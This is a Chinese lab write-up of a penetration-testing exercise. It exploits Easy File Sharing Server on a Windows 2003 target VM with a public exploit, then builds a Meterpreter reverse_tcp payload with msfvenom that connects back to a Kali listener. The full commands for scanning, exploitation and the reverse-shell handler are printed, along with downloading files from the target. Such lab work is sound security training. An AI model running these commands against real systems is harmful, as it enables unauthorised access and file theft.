一、漏洞渗透测试
(一)靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。
1.在Win2003中安装easy file sharing server(efssetup_2018.zip)
2.将efssetup_2018.zip直接拖进Win2003解压并安装,一直next即可,安装路径可以自己选择,安装成功后直接Try it!由于80端口被占用,所以这里将端口改为8000
(二)利用Nmap发现靶(Windows)运行了该服务
1.kali和Windows均设为桥接模式并连接手机热点
2.kali在root模式下对整个子网进行扫描
3.找到Windows靶机存活且ip为192.168.154.209
4.使用nmap -sV 192.168.154.209扫描靶机端口开放情况,发现靶机开放了easy file sharing server服务
5.使用命令searchsploit easy file sharing检测easy file sharing server存在的漏洞
6.对于39009.py程序,使用命令searchsploit -m 39009查询地址
7.执行python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.154.209 8000命令,Windows靶机即会弹出计算器,easy file sharing server被终止
二、Metasploit应用
1.在kali用ifconfig命令得到kali的ip
kali:192.168.154.135
2.使用命令msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.154.135 lport=5000 -f exe -o /root/payload.exe在桌面生成一个payload.exe文件
3.使用命令msfconsole打开Metasploit
4.在Metasploit中依次使用指令
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.154.135
set lport 5000
exploit
5使用命令chmod 777 /root打开root文件的查看权限,将payload.exe文件移至Windows靶机中并双击运行,并在kali中查看变化,出现以下的提示则证明已经获得了对靶机的操控权限
6.使用ls命令查看文件
7.使用命令download 文件名下载所需要的文件即可